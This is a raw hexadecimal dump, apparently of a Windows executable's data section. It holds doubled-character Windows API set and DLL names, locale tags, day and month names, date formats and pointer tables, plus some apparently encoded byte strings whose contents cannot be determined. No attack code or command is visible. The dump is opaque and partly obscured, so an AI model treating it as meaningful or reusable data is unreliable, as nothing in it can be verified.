0084cb6fc4ab7af8756198ccbf7d7bf9766ff082c1540038c722220000ebe0e3b5f6540038c72121000048cb47eceb0f008c131bcb6fccc8adb9030074535b60dcd7bda9030074488bcb47e47b980f000084c1d5783c50c1fd5004771fcb6fcc68c35192c37211feea0300747b79cd601cb3403c265048b6ff7f00dcebebd8f0c446c56814b0bd0892a700007451d337813454c81102040014fcd1c32587a700008bc76814b3625e570c1f040074ff501cd3e38b625e573e2d0400744d8ec3d7786408c3ff506c00cb47e47f9c83131bcb6fcc68c352314e5d04007c60dc34c8484380cb47e47bb24c5e04003384cb6fc4c0637004007c63df77cb47eceb0f33da59720e00ffda9bb00e00cc0000000000802f227d7976fa854fc28dc759934eb8f754514ab8ef5e4ecb43d8514ac385c05eaf6a95db5c4077e9a07881c3400bc98677eaa37c4fbe3e89cb43e86d7ef0b990d1f3030f000000000000000000000084c1d5782c5f1fcb6fcc68c35291c5b0b1c1b200b7c34427dc3400008545b4566a63f497c3589bc344276a7d0000b7cd45b47b84cb64e529f7e8275363e1eae931f388c3d7781478cb47e47f9c0f000084c34a78f4175a00665f317c7730f3038b2b2b74744bcbfbf341b8691545007579b6b1090200665f6849179b54030f0084cb6fc465c6ca7970c34183c25a39e50d0000b8b901000048cb47eceb0f00008c1316ce9350c3519bc2601bb4c74288b7f60448c75aa56752cacb48452e3354f32f944fd2992bab846ff2982aa089c19f0458c3c8539bc340404b4843feb7420c7b7e05b9f742806310bc4fcb847ff983c24292b28e0f970033000000000000000000000000aa0069109b840000000048cb6ffc5cc59d3068c5d5782c457ee897c1d9703c5467fb9d424d91b629c79739351000004d76e82181647127c063e2f0bdc0169bf00f00be87c5034d76e821879aa3c79f3068c7d7782c40cb47d4e2310f0000000000000000000000000000000000000000aa0069109b84000000004cc75295c7599bca7be81f89f670000049ca7bd8563c0263faa27c46c2498b4ac38873f3c783ba35030049c879788000000f89ef6b02000fb59f70feab00010e8c28aa010049c2488fc75497c372b0c24384c74d8fc2790157edc27bb9c27038cc1f12434e1f5c5ce0ff1e10404e1e5d44f8b8c34a02a50069109b840000000048c34a8dc1809bddb400bcc8070df6c3b400494aca361e2174b400df6bb400c175b400cf7bb4000bbeb50010a5b5002095b5003085b500c87cb40060d5b50070c5b500f044b4008035b50048fdb5009025b500b005b500e551b4000f105b4400c3ccb8bd6cef81cb8bc38142c181cbccb8bd4e4bb9f44064ef814cccc842c1ccb9bc8280cb30fc606df1fc707fc3a5f6dcc7890db8fd424c4bb9fc4046c58966efc1404cccc04243c2400848818381cb48814e4bb9f4468d814cccc844c7a5f61b814e4bb8f5468d816e22cdc944c7531b814e4bb8f546404bb9fc4c8f816e22cdc94440ccc04ec58fc78989c1424c4bb9fc4640c58989c1404cccc044cfa5f6dcc7890db9fc4244c58988c040cba5f6dcc7890db8fd4244c58966efc140cb53dcc78989c14244c58989c140cbcc101f4cc78989c1424c4bb8fd4640c58989c1406e22cdc144cfa569109b84000000004cc78989c1424c4bb8fd46484bb9e45c42c58989c1406e22cdc14448ccd85ecdcc1f140e464fc289cb42d151b735cc7b671c27e080cb6211ff1f140e42cb42d1514e1e1a4767ea8cc643818828ee088b0c8800000f2668b1bc77361c8b9a007661fe2bc20000660069109b84000000000f2668a1ef2660b9ff1f140e051f5c461a58c940418000000f2668c18f2660d99f1f544eaaaf1f5c46baf9b636c62668e1af2660f9bf1f544ecacf1f5c46dadf266881cf266099df1f544eeaef1f5c46fa85d8a22668a1a9ca639f7027e92ae7031f140e42cb42d159ca6bf85dc643818828ed70687a000069109b84000000000f1e50b1ff1f140e42cb42d159b636bc9aa6ca63ef7b7944c4890c071f5c4ef2ff1e59b8ff1e50b1b9c24800cc105f400f246aa1ef2462b9ff179c8e0a0202000f1f140e051f5c461a58c940418000000f246ac18f2462d99f1f544eaaaf1f5c46baf9b636c6246ae1af2462f9bf1f544ecacf1f5c46dadf179c8e4a4202000f246a81cf246299df1f544eeaef1f5c46fa85e892a15611d1c70000f0105b4400494acbc71f544efab8cb6af959ca6bf8e637ce7b635fc34a89cb6211ff1fd8c71f140e051e1944c74a8c66e88ec643818828ee731c672628eae66b69105b44000f2668511f2620061f544efaff1f5c46eaa8c968698000000f2668317f2660296f1f544e5a5f1f5c464a09b636c62668115f2660094f1f544e3a3f1f5c462a2f2668713f2660692f1f544e1a1f1f1c067fdba126685159ca639f7027e98cc643818828ed706e7c0069109b84000000000f1e1049cb6af91f1f140e43b636bc85b9ca63ef7b7c494e1f1a4b4e1e1a041e1048c248000f00000000000000000000000000000000aa0069109b84000000004863fa98ca7bf07a50d437c6736072f61a8b3b3e0e7f5964b73e88b6373e37c6729ba3c643818828ea766a52c845b47b858b3b3e0e7f7944b73e88b637bd84b97bf303d8db435b273c53d98828eb76437fc38a49733f0e7f2e13c3ca4940737f4e027d3904c3ca5158737f4e1a654875c3ca5950737f4e126d5b66cb42e169b636bcb884ca63ff52c643818828ea77efd3c38a49733f0e7f6e53cb42c941b636bc9ba7ca63e7ec68cbcb42c940cb42c940cb42c940c3871d5947c78047c68173fadadb435b273c0f0000000000000000000000000000aa0069109b8400000000ff1f2c000000000000000000000000008c151dcb6fcc68c36160c70d08cb47e47db4af2a9300338c151dcb6fcc68c361028705950075c77570cb47e47db4c3469300338c151dcb6fdc78c361a2c38a8a9b58c1c5680ca1dd70046cc1801a729a00b3c7ce35fbde3d20c3c62d8877f696006fd8cb47f46d9e0f8c151dc361a2c38a32fa48b93d0500c0cf9b554a4a9c9e0f8c151dcb6fcc68c361d9fa81cb47e47db4a7da6b00338c151dcb6fcc68c361a2c38a8a83e0365c7d006fd8cb47e47d9e0f8c151dcb6fcc68c36153bb02000048cb47e47db4f38e6b00338c151dcb6fcc68c361a2c3ce0dc38340cb47e47db4e9946b00338c151dcb6fcc68c361a2c30e0d8800008b8340cb47e47db40a706c00338c151dcb6fcc68c36153bc05000048cb47e47db423596c00338c151dcb6fcc68c3616a3d3d80000000747fb2ba030000e8453e6c006fd8cb47e47d9e0f8c151dcb6fcc68c36153bd04000048cb47e47db4641e6c00338c151dcb6fcc68c36153be07000048cb47e47db49de76c00338c151dcb6fcc68c361a2c3c62580f9ae40006fd8cb47e47d9e0f8c151dcb6fcc68c36153b108000048cb47e47db4a8d26c00338c151dcb6fcc68c36153b108000048cb47e47db4c1bb6c00338c151dcb6fcc68c361a2c3ce0dc38340cb47e47db45f642d00338c151dcb6fcc68c36161c61d18cb47e47db4764d2d00338c151dcb6fcc68c361a2c3c67d78cb47e47db466314100338c151dcb6fcc68c361a2c38a80b93d0500c0b4788db9251d00c0b47037f32beebdb901000048cb47e47d9e0f00000000000000000000000000008c151dcb6fcc68c361a2c38a32fa48b93d0500c0cf9b554a4a89cb47e47d9e0fcc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c089480100000000c881480100000000d69f480100000000e4ad480100000000f2bb4801000000006c234e01000000005e114e01000000004a054e010000000038774e0100000000a2e84b0100000000b6fc4b0100000000d09a4b0100000000e4ae4b0100000000004b4a01000000001e554a010000000032794a0100000000460d4a010000000062294a01000000007c374a010000000092d94a0100000000a8e34a0100000000c2894a0100000000d8934a0100000000eca74a0100000000feb54a0100000000125e4d0100000000206c4d010000000038744d01000000004c004d01000000005e124d01000000006e224d01000000007e324d010000000096da4d0100000000aee24d0100000000c68a4d0100000000eea24d0100000000fab64d010000000008454c0100000000165b4c0100000000206d4c01000000002e634c0100000000400d4c0100000000521f4c0100000000602d4c0100000000763b4c01000000008cc14c0100000000a2ef4c0100000000b8f54c0100000000c4894c0100000000d09d4c0100000000e0ad4c0100000000eca14c0100000000004e4f0100000000105e4f0100000000226c4f01000000002c624f010000000038764f0100000000440a4f010000000056184f010000000068264f010000000082cc4f01000000009cd24f0100000000aee04f0100000000bef04f0100000000cc824f0100000000de904f0100000000eaa44f0100000000f8b64f010000000008474e0100000000145b4e010000000028674e01000000007c334e0100000000000000000000000086cc4b0100000000743e4b010000000062284b01000000004e044b01000000003a704b01000000002e644b0100000000105a4b01000000000000000000000000a08c2c808101000010a9b9808101000000000000000000000000000000000000000000000000000068ed8580810100002c54788081010000d079a9808101000000000000000000000000000000000000ccb57980810100004ce1ad80810100004c35798081010000000000000000000000000000000000000000000000000000000000000000000090c9588181010000306a5b81810100000000000000000000c8fd3481810100002c062a8081010000b09a2a8081010000553b05050118194e451d1b0615041d06016e00000000000040763781810100002c062a8081010000b09a2a808101000062030544410d00030c02151d06016e00c0f63781810100002c062a8081010000b09a2a8081010000620305444113001318594e0b12574c090b09131c68000000487f368181010000ac802c808101000063101e8de10100000000000000000000000000000000000004040000000000002025968a1900000000000000000000000000000000000000000000000000000020e4c4808101000038fcc4808101000078bcc48081010000b87cc480810100006161646476766161707069693333323200000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6666696962626565727273732d2d6c6c31312d2d31312d2d31310000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d737379796e6e636368682d2d6c6c31312d2d32322d2d303000000000000000006b6b656572726e6e65656c6c3333323200000000000000000101000003030000462a1f322d00030c63000000000000000101000003030000462a1f35341700650101000003030000462a1f34221122370d191065000000000101000003030000462a1f20361122370d1910650000000002020000030300004927071d1d080d05131f26311b1d1d0a020d3f3606171d06012b3d780000000070b8c880810100008048c880810100008840c880810100009850c88081010000a860c88081010000b870c88081010000c800c88081010000d810c88081010000e42cc88081010000f038c88081010000f830c8808101000008c1c9808101000018d1c9808101000022ebc9808101000024edc9808101000030f9c9808101000038f1c980810100003cf5c980810100004089c98081010000448dc980810100004881c980810100004c85c980810100005099c980810100005891c9808101000064adc9808101000068a1c980810100006ca5c9808101000070b9c9808101000074bdc9808101000078b1c980810100007cb5c980810100008049c98081010000844dc980810100008841c980810100008c45c980810100009059c98081010000945dc980810100009851c980810100009c55c98081010000a069c98081010000a46dc98081010000a861c98081010000ac65c98081010000b079c98081010000b47dc98081010000b871c98081010000bc75c98081010000c009c98081010000c40dc98081010000c801c98081010000cc05c98081010000d019c98081010000d41dc98081010000d811c98081010000dc15c98081010000e029c98081010000f039c9808101000000caca808101000008c2ca808101000018d2ca808101000030faca8081010000408aca80810100005892ca808101000078b2ca80810100009852ca8081010000b872ca8081010000d812ca8081010000f832ca808101000020ebcb8081010000408bcb808101000068a3cb80810100008843cb8081010000b07bcb8081010000d01bcb8081010000e02bcb8081010000e42fcb8081010000f03bcb808101000000cccc808101000024e8cc808101000030fccc8081010000408ccc8081010000509ccc808101000070bccc8081010000905ccc8081010000b874cc8081010000e02ccc808101000008c5cd808101000038f5cd80810100005895cd8081010000804dcd8081010000a865cd8081010000d815cd808101000008c6ce808101000028e6ce808101000022ebc9808101000038f6ce8081010000509ece808101000070bece80810100008846ce8081010000a866ce80810100005f003d031216014c28000000000000005f003c0701060f6c5f002f111210020d6c000000000000005f002c071007020d006c0000000000005f002b1c011a10020d006c00000000005f003907120717020d006c00000000005f00291306171b1d11020d006c0000005f003c0f1e11020d006c00005f003a04030b6900000000005f002f04064402345f002d171607061b0a177400000000005f002a1b0f0d050e090b01640000000072171607061b0a175c280000204e0b12770000000000000020440109091111653d3d00003e003e003c003c00212100003d003d00211c3d005b065d00000000006f1f151713151b1d720000002d133e002a2a00002b002b002d002d002d2d00002b2b0000262600002d13142a2f2f0000252500003c3c00003c013d003e3e00003e033d002c2c0000280129007e7e00005e5e00007c7c0000260026007c007c002a173d002b163d002d103d002f123d0025183d003e00033d3c00013d261b3d007c413d005e633d006016101215030e0942270000000000006016141615030e094227000000000000601615020d004b2760140d09150a09412700000000000000600c030c020d4c530715151d0a4347121413164327000000601307061b07094027000000000000006016140312164544011607060716171b1d5527000000000060161306171b1d5244010909111d07094744011607060716171b1d5527000000600401030714191854430c011d07060716171b1d52430f031c06071742270000601310020d0d135244010909111d07094744011607060716171b1d552700000060161306171b1d52430c011d07060716171b1d52491d111713151b1d5527000060161306171b1d5244011607060716171b1d52491d111713151b1d552700000060161306171b1d52561403121645430c011d07060716171b1d52491d111713151b1d55270000000060161f1b0601140d4c440d1a031c0d020608080b1a544d0c115727000000000060050d48561306171b1d52430c011d07060716171b1d52491d111713151b1d55270000000000000060050d48561306171b1d5244011607060716171b1d52491d111713151b1d552760050d48561306171b1d52561403121645430c011d07060716171b1d52491d111713151b1d55270060030c1f0959430c011d07060716171b1d52430f031c06071742270000000000601511105452171101071c070709402760250d48603206001d49000000000000600c030c020d4c56101215030e094227600c030c020d4c56101215030e0945430c011d07060716171b1d52430f031c0607174227204e0b122c065d0000000000204401090911113e065d000000000000600f0203074943020d001f1a0e40270060101c0d020608080b1a5444010909111145430f031c0607174227000000000060101c0d020608080b1a544401090911113e067d430f031c0607174227000000600d0c0f0f06020144561306171b1d52430c011d07060716171b1d52491d111713151b1d55270000600d0c0f0f06020144561306171b1d5244011607060716171b1d52491d111713151b1d552700000060050d48561306171b1d52430c1f0959430c011d07060716171b1d52491d111713151b1d5527000060050d48561306171b1d52561403121645430c1f0959430c011d07060716171b1d52491d111713151b1d55270000000060041d170f0c040a434907071d1d080d05131f175246091d520727000000000060041d170f0c040a434115111d111d5444011607060716171b1d5246091d5207270000000000000060161306171b1d52430c1f0959430c011d07060716171b1d52491d111713151b1d5527000000000060161306171b1d52561403121645430c1f0959430c011d07060716171b1d52491d111713151b1d552700000000000000600d0c0f0f06020144561306171b1d52430c1f0959430c011d07060716171b1d52491d111713151b1d55270000000000600c030c020d4c530715151d0a43541c1a1704054447121413164327000000006f1f151713151b1d520200022000000020742d09154564211610111b19041b1d5527000000000000206223121645632f0d12005364211610111b19041b1d52411554082800000000206223121645632f0d12005361330013185e27000000000020632f0d12005368210c171313110b115964211610111b19041b1d552700000020632c021d1c091111456f2d080f0617546c230c02151b1d55270000000000000000000000000000050500c0cb0b000000000000000000001d1d00c0c40400000000000000000000969600c0c404000000000000000000008d8d00c0c808000000000000000000008e8e00c0c808000000000000000000008f8f00c0c80800000000000000000000909000c0c80800000000000000000000919100c0c80800000000000000000000929200c0c80800000000000000000000939300c0c80800000000000000000000b4b602c0c80800000000000000000000b5b702c0c808000000000000000000000c0c000000000000030300000000000009090000000000006d6d737363636f6f7272656565652e2e64646c6c6c6c0000432c1d373d111d24221d0c06160073004c05498081010000000000000000000098d149808101000000000000000000005008588081010000104959808101000094dd49808101000094dd49808101000068254d8081010000cc814d8081010000305f6f80810100004c236f80810100000000000000000000eca549808101000010435380810100004c1f53808101000040317180810100007c0d71808101000064096d808101000094dd49808101000048216980810100000000000000000000000000000000000094dd4980810100000000000000000000f4bd49808101000094dd49808101000084cd498081010000602949808101000094dd49808101000060b1d18081010000b061d1808101000038fcc48081010000f021d1808101000030e2d280810100008052d28081010000e032d2808101000030e3d3808101000078bcc4808101000070a3d38081010000b063d38081010000f023d3808101000030e4d480810100008054d48081010000e034d480810100004095d580810100009045d5808101000020e4c48081010000b87cc48081010000e035d580810100006161707069692d2d6d6d73732d2d777769696e6e2d2d6161707070706d6d6f6f646465656c6c2d2d727275756e6e747469696d6d65652d2d6c6c31312d2d31312d2d31310000000000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6464616174746565747469696d6d65652d2d6c6c31312d2d31312d2d313100006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d666669696c6c65652d2d6c6c32322d2d31312d2d3131000000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6c6c6f6f636361616c6c69697a7a6161747469696f6f6e6e2d2d6c6c31312d2d32322d2d3131000000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6c6c6f6f636361616c6c69697a7a6161747469696f6f6e6e2d2d6f6f626273736f6f6c6c6565747465652d2d6c6c31312d2d32322d2d303000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d707072726f6f636365657373737374746868727265656161646473732d2d6c6c31312d2d31312d2d32320000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d73737474727269696e6e67672d2d6c6c31312d2d31312d2d30300000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d73737979737369696e6e66666f6f2d2d6c6c31312d2d32322d2d3131000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d777769696e6e727274742d2d6c6c31312d2d31312d2d303000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d7878737374746161747465652d2d6c6c32322d2d31312d2d30300000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d7272747463636f6f727265652d2d6e6e747475757373656572722d2d777769696e6e64646f6f77772d2d6c6c31312d2d31312d2d3030000000006161707069692d2d6d6d73732d2d777769696e6e2d2d737365656363757572726969747479792d2d737379797373747465656d6d666675756e6e6363747469696f6f6e6e73732d2d6c6c31312d2d31312d2d30300000000000000000000000006565787874742d2d6d6d73732d2d777769696e6e2d2d6b6b656572726e6e65656c6c333332322d2d7070616163636b6b6161676765652d2d636375757272727265656e6e74742d2d6c6c31312d2d31312d2d30300000000000000000000000006565787874742d2d6d6d73732d2d777769696e6e2d2d6e6e747475757373656572722d2d6464696961616c6c6f6f676762626f6f78782d2d6c6c31312d2d31312d2d30300000000000000000000000006565787874742d2d6d6d73732d2d777769696e6e2d2d6e6e747475757373656572722d2d777769696e6e64646f6f7777737374746161747469696f6f6e6e2d2d6c6c31312d2d31312d2d303000000000757573736565727233333232000000000202000012120000020200001212000002020000121200000202000012120000000000000e0e000047221137360700170b1a243102080a06022c2d6400000000080800001212000004040000121200004c0f0e2c112327061b0709223d78000004040000121200004c230c020d092b2f0c08313b230f0a0d44000000000000000101000016160000020200000202000003030000020200000404000018180000050500000d0d00000606000009090000070700000c0c0000080800000c0c0000090900000c0c00000a0a0000070700000b0b0000080800000c0c0000161600000d0d0000161600000f0f000002020000101000000d0d000011110000121200001212000002020000212100000d0d00003535000002020000414100000d0d000043430000020200005050000011110000525200000d0d0000535300000d0d00005757000016160000595900000b0b00006c6c00000d0d00006d6d000020200000707000001c1c000072720000090900000606000016160000808000000a0a0000818100000a0a000082820000090900008383000016160000848400000d0d000091910000292900009e9e00000d0d0000a1a1000002020000a4a400000b0b0000a7a700000d0d0000b7b7000011110000cece000002020000d7d700000b0b0000181f07000c0c0000f82fd7808101000008d0d8808101000018c0d8808101000028f0d880810100006a6a61612d2d4a4a50500000000000007a7a68682d2d43434e4e0000000000006b6b6f6f2d2d4b4b52520000000000007a7a68682d2d54545757000000000000000000000000000000dbdb808101000004dfdb808101000008d3db80810100000cd7db808101000010cbdb808101000014cfdb808101000018c3db80810100001cc7db808101000024ffdb808101000030ebdb808101000038e3db80810100004893db8081010000548fdb808101000060bbdb80810100006cb7db808101000070abdb808101000074afdb808101000078a3db80810100007ca7db8081010000805bdb8081010000845fdb80810100008853db80810100008c57db8081010000904bdb8081010000944fdb80810100009843db8081010000a07bdb8081010000a873db8081010000b46fdb8081010000bc67db80810100007ca7db8081010000c41fdb8081010000cc17db8081010000d40fdb8081010000e03bdb8081010000f02bdb8081010000f823db808101000008d4dc808101000014c8dc808101000018c4dc808101000020fcdc808101000030ecdc80810100004894dc808101000001010000000000005884dc808101000060bcdc808101000068b4dc808101000070acdc808101000078a4dc8081010000805cdc80810100008854dc8081010000904cdc8081010000a07cdc8081010000b06cdc8081010000c01cdc8081010000d804dc8081010000f02cdc808101000000dddd808101000018c5dd808101000020fddd808101000028f5dd808101000030eddd808101000038e5dd8081010000409ddd80810100004895dd8081010000508ddd80810100005885dd808101000060bddd808101000068b5dd808101000070addd808101000078a5dd80810100008855dd8081010000a07ddd8081010000b06ddd808101000038e5dd8081010000c01ddd8081010000d00ddd8081010000e03ddd8081010000f02ddd808101000008d6de808101000018c6de808101000030eede8081010000449ade80810100004c92de80810100005886de808101000070aede80810100009846de8081010000b06ede808101000053261b6e4d22016e5421106557320164543c1d7546341b695332157453261b0a051879004d22010a051879000000000054211016170518795732010a0b1617051879000000000000543c1d07011705187900000046341b0d05187900000000005332150107160518790000004a2b0f6e462307624d2c1372413102724d2c18794a3f1b6e4a3f196c41341267533615704f2c17744e21197644210663000000004a2b0f1b14130b79462307100714130b790000004d2c13110b6800004131021b056c00004a3f1b0b650000004a3f1915790000004134121206077400000000005336150411080f0717720000000000004f2c171b0d0717724e211913080f0717720000000000000044210606080f071772000000410c4d00501d4d00000000004d00624b004b5600790000000000000064000000480c6d0000006d4400480c59000000790000000048007257005749007300000000000000535375756e6e00004d4d6f6f6e6e000054547575656500005757656564640000545468687575000046467272696900005353616174740000535375756e6e646461617979000000004d4d6f6f6e6e64646161797900000000545475756565737364646161797900005757656564646e6e65657373646461617979000000000000545468687575727273736464616179790000000000000000464672726969646461617979000000005353616174747575727264646161797900000000000000004a4a61616e6e000046466565626200004d4d61617272000041417070727200004d4d6161797900004a4a75756e6e00004a4a75756c6c0000414175756767000053536565707000004f4f6363747400004e4e6f6f7676000044446565636300004a4a61616e6e757561617272797900004646656562627272757561617272797900000000000000004d4d616172726363686800000000000041417070727269696c6c0000000000004a4a75756e6e656500000000000000004a4a75756c6c7979000000000000000041417575676775757373747400000000535365657070747465656d6d6262656572720000000000004f4f636374746f6f62626565727200004e4e6f6f767665656d6d626265657272000000000000000044446565636365656d6d6262656572720000000041414d4d0000000050504d4d00000000000000004d4d4d4d2f2f646464642f2f79797979000000000000000064646464646464642c2c20204d4d4d4d4d4d4d4d2020646464642c2c202079797979797979790000484848483a3a6d6d6d6d3a3a73737373000000000000000065656e6e2d2d5555535300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000202020202020202020202020202020202020282828282828282828282020202020202020202020202020202020202020202020202020202020202020202020204848101010101010101010101010101010101010101010101010101010101010848484848484848484848484848484848484848410101010101010101010101010108181818181818181818181810101010101010101010101010101010101010101010101010101010101010101010101010101010110101010101010101010101082828282828282828282828202020202020202020202020202020202020202020202020202020202020202020202020202020202101010101010101020200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000080010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f01030107010301ff010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f210301070103010f010301070103011f010301070103010f010321070103013f010301070103010f010301070103011f010301070103010f01030107010301ff010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f01030107010301ff010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f210301070103010f010301070103011f010301070103010f01032107010301ff010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f01030107010301fe0100000000000000f3f38081010000020200000000000008fbf38081010000030300000000000010e3f38081010000040400000000000018ebf38081010000050500000000000028dbf38081010000060600000000000030c3f38081010000070700000000000038cbf38081010000080800000000000040b3f38081010000090900000000000048bbf380810100000a0a00000000000050a3f380810100000b0b00000000000058abf380810100000c0c0000000000006093f380810100000d0d000000000000689bf380810100000e0e0000000000007083f380810100000f0f000000000000788bf3808101000010100000000000008073f380810100001111000000000000887bf3808101000012120000000000009063f380810100001313000000000000986bf380810100001414000000000000a053f380810100001515000000000000a85bf380810100001616000000000000b043f380810100001818000000000000b84bf380810100001919000000000000c033f380810100001a1a000000000000c83bf380810100001b1b000000000000d023f380810100001c1c000000000000d82bf380810100001d1d000000000000e013f380810100001e1e000000000000e81bf380810100001f1f000000000000f003f380810100002020000000000000f80bf38081010000212100000000000000f4f48081010000222200000000000008fcf48081010000232300000000000010e4f48081010000242400000000000018ecf48081010000252500000000000020d4f48081010000262600000000000028dcf48081010000272700000000000030c4f48081010000292900000000000038ccf480810100002a2a00000000000040b4f480810100002b2b00000000000048bcf480810100002c2c00000000000050a4f480810100002d2d00000000000058acf480810100002f2f0000000000006094f480810100003636000000000000689cf4808101000037370000000000007084f480810100003838000000000000788cf4808101000039390000000000008074f480810100003e3e000000000000887cf480810100003f3f0000000000009064f480810100004040000000000000986cf480810100004141000000000000a054f480810100004343000000000000a85cf480810100004444000000000000b044f480810100004646000000000000b84cf480810100004747000000000000c034f480810100004949000000000000c83cf480810100004a4a000000000000d024f480810100004b4b000000000000d82cf480810100004e4e000000000000e014f480810100004f4f000000000000e81cf480810100005050000000000000f004f480810100005656000000000000f80cf48081010000575700000000000000f5f580810100005a5a00000000000008fdf58081010000656500000000000010e5f580810100007f7f00000000000018edf58081010000010504000000000020d5f58081010000020604000000000030c5f58081010000030704000000000040b5f58081010000040004000000000028f0d88081010000050104000000000050a5f5808101000006020400000000006095f5808101000007030400000000007085f58081010000080c0400000000008075f58081010000090d040000000000b06ede80810100000b0f0400000000009065f580810100000c08040000000000a055f580810100000d09040000000000b045f580810100000e0a040000000000c035f580810100000f0b040000000000d025f580810100001014040000000000e015f580810100001115040000000000f82fd78081010000121604000000000018c0d880810100001317040000000000f005f58081010000141004000000000000f6f68081010000151104000000000010e6f68081010000161204000000000020d6f68081010000181c04000000000030c6f68081010000191d04000000000040b6f680810100001a1e04000000000050a6f680810100001b1f0400000000006096f680810100001c180400000000007086f680810100001d190400000000008076f680810100001e1a0400000000009066f680810100001f1b040000000000a056f680810100002024040000000000b046f680810100002125040000000000c036f680810100002226040000000000d026f680810100002327040000000000e016f680810100002420040000000000f006f68081010000252104000000000000f7f78081010000262204000000000010e7f78081010000272304000000000020d7f78081010000292d04000000000030c7f780810100002a2e04000000000040b7f780810100002b2f04000000000050a7f780810100002c280400000000006097f780810100002d29040000000000788ff780810100002f2b040000000000887ff780810100003236040000000000986ff780810100003430040000000000a85ff780810100003531040000000000b84ff780810100003632040000000000c83ff780810100003733040000000000d82ff78081010000383c040000000000e81ff78081010000393d040000000000f80ff780810100003a3e04000000000008f0f880810100003b3f04000000000018e0f880810100003e3a04000000000028d0f880810100003f3b04000000000038c0f88081010000404404000000000048b0f88081010000414504000000000058a0f8808101000043470400000000006890f8808101000044400400000000008078f8808101000045410400000000009068f880810100004642040000000000a058f880810100004743040000000000b048f88081010000494d040000000000c038f880810100004a4e040000000000d028f880810100004b4f040000000000e018f880810100004c48040000000000f008f880810100004e4a04000000000000f9f980810100004f4b04000000000010e9f98081010000505404000000000020d9f98081010000525604000000000030c9f98081010000565204000000000040b9f98081010000575304000000000050a9f980810100005a5e0400000000006099f9808101000065610400000000007089f980810100006b6f0400000000008079f980810100006c680400000000009069f980810100008185040000000000a059f980810100000109080000000000b049f98081010000040c08000000000008d0d88081010000070f080000000000c039f980810100000901080000000000d029f980810100000a02080000000000e019f980810100000c04080000000000f009f98081010000101808000000000000fafa8081010000131b08000000000010eafa8081010000141c08000000000020dafa8081010000161e08000000000030cafa80810100001a1208000000000040bafa80810100001d1508000000000058a2fa80810100002c240800000000006892fa80810100003b33080000000000807afa80810100003e36080000000000906afa8081010000434b080000000000a05afa80810100006b63080000000000b842fa8081010000010d0c0000000000c832fa808101000004080c0000000000d822fa8081010000070b0c0000000000e812fa808101000009050c0000000000f802fa80810100000a060c000000000008f3fb80810100000c000c000000000018e3fb80810100001a160c000000000028d3fb80810100003b370c000000000040bbfb80810100006b670c000000000050abfb80810100000111100000000000609bfb80810100000414100000000000708bfb80810100000717100000000000807bfb80810100000919100000000000906bfb80810100000a1a100000000000a05bfb80810100000c1c100000000000b04bfb80810100001a0a100000000000c03bfb80810100003b2b100000000000d02bfb80810100000115140000000000e01bfb80810100000410140000000000f00bfb8081010000071314000000000000fcfc8081010000091d14000000000010ecfc80810100000a1e14000000000020dcfc80810100000c1814000000000030ccfc80810100001a0e14000000000040bcfc80810100003b2f14000000000058a4fc808101000001191800000000006894fc808101000009111800000000007884fc80810100000a121800000000008874fc80810100000c141800000000009864fc80810100001a02180000000000a854fc80810100003b23180000000000c03cfc8081010000011d1c0000000000d02cfc808101000009151c0000000000e01cfc80810100000a161c0000000000f00cfc80810100001a061c000000000000fdfd80810100003b271c000000000018e5fd8081010000012120000000000028d5fd8081010000092920000000000038c5fd80810100000a2a20000000000048b5fd80810100003b1b20000000000058a5fd808101000001252400000000006895fd8081010000092d2400000000007885fd80810100000a2e2400000000008875fd80810100003b1f2400000000009865fd80810100000129280000000000a855fd80810100000921280000000000b845fd80810100000a22280000000000c835fd8081010000012d2c0000000000d825fd808101000009252c0000000000e815fd80810100000a262c0000000000f805fd8081010000013130000000000008f6fe8081010000093930000000000018e6fe80810100000a3a30000000000028d6fe8081010000013534000000000038c6fe8081010000093d34000000000048b6fe80810100000a3e34000000000058a6fe808101000001393800000000006896fe80810100000a323800000000007886fe8081010000013d3c00000000008876fe80810100000a363c00000000009866fe80810100000141400000000000a856fe80810100000a4a4000